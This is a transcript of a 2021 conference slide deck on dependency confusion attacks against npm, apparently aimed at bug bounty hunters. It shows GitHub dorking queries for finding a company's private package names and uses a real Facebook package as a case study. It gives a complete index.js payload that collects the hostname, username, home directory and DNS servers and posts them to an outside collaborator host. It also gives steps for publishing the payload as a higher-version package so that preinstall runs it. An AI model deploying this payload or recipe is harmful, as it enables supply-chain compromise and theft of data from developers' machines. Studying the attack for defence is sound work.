Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dependency Confusion

Aditya Shende
November 23, 2021

Dependency Confusion

DAMNCON, the cyber conference. This will provide you with meaningful insights and the right knowledge for you to move to the next step.

Speaker: Aditya Shende

Topic: Dependency Confusion

Aditya Shende

November 23, 2021
Tweet

More Decks by Aditya Shende

Other Decks in Technology

Transcript

  1. Bug Bounty Hunter and Trainer
    Red Team Ops @Agri10x
    Masters In Cyber Security @UEA
    Interested in WebApps, Functional Exploits and
    Bikes
    INDIAN
    WHOAMI ?

    View full-size slide

  2. Dependecy
    Confusion

    View full-size slide

  3. What is Dependency
    Confusion ???
    A Dependency Confusion attack, also known as a supply chain
    substitution attack, occurs when a software installer script is
    tricked into downloading a malicious code file from a public
    repository rather than the intended file of the same name from
    an internal repository.

    View full-size slide

  4. Difference ???
    1. As seen in the above image, the Public Package contains a higher
    version than the Private Package.
    2. As a result, if the package indexing is not completed properly, it will
    automatically retrieve the Higher version package from the Public
    Registry.

    View full-size slide

  5. How to find Private Packages ?
    Within Organization, use Github Dorking with keywords like package.json


    org:Samsung package.json


    Use filters like : language:json


    org:Samsung package.json language:json


    org:target_org package.json language:json

    View full-size slide

  6. It can be also found using npm package.json
    disclosure nuclei template.


    View full-size slide

  7. Case Study
    https://github.com/facebook/flipper/blob/45ce538c8dd6b44
    8388a01e2ed4fa398956e5e20/desktop/eslint-plugin-
    flipper/package.json
    1.
    2. Package Name: eslint-plugin-flipper
    3. Type: Private
    wget
    https://github.com/facebook/flipper/blob/45ce538c8dd6b44
    8388a01e2ed4fa398956e5e20/desktop/eslint-plugin-
    flipper/package.json

    View full-size slide

  8. We have to check if private package exist or not
    We have to check on offcial website :
    https://www.npmjs.com/

    View full-size slide

  9. Install NPM using the following command
    Creating Malicious Packages (NPM)


    apt install npm
    npm login
    npm init : Create package
    1.
    2.
    3.

    View full-size slide

  10. After successful creation of the package.json file , we need to edit the created file to
    execute our own scripts and command. Index.js
    const os = require("os");const dns = require("dns");const querystring =
    require("querystring");const https = require("https");const packageJSON =
    require("./package.json");const package = packageJSON.name;const trackingData =
    JSON.stringify({p: package,c: __dirname,hd: os.homedir(),hn: os.hostname(),un:
    os.userInfo().username,dns: dns.getServers(),r: packageJSON ? packageJSON.___resolved :
    undefined,v: packageJSON.version,pjson: packageJSON,});var postData =
    querystring.stringify({msg: trackingData,});var options = {hostname: "burpcollaborator.net",
    //replace burpcollaborator.net with Interactsh or pipedreamport: 443,path: "/",method:
    "POST",headers: {"Content-Type": "application/x-www-form-urlencoded","Content-Length":
    postData.length,},};var req = https.request(options, (res) => {res.on("data", (d) =>
    {process.stdout.write(d);});});req.on("error", (e) => {//
    console.error(e);});req.write(postData);req.end();

    View full-size slide

  11. Now there will be two files created package.json ,
    index.js.
    Before publishing the package to public registry make
    sure this package name Doesn’t exist in the Public
    Registry.
    Use the following command to publish the package.
    Pushing into Public Registry (NPM)

    View full-size slide

  12. The Published package contains
    Higher Version compared to the
    original one.

    View full-size slide

  13. packages, our package.json file preinstall scripts will
    execute the index.js file and obtain the hostname,
    directory, IP address, and username as shown below.

    View full-size slide

  14. Thank you guys


    DAMNcon2021


    View full-size slide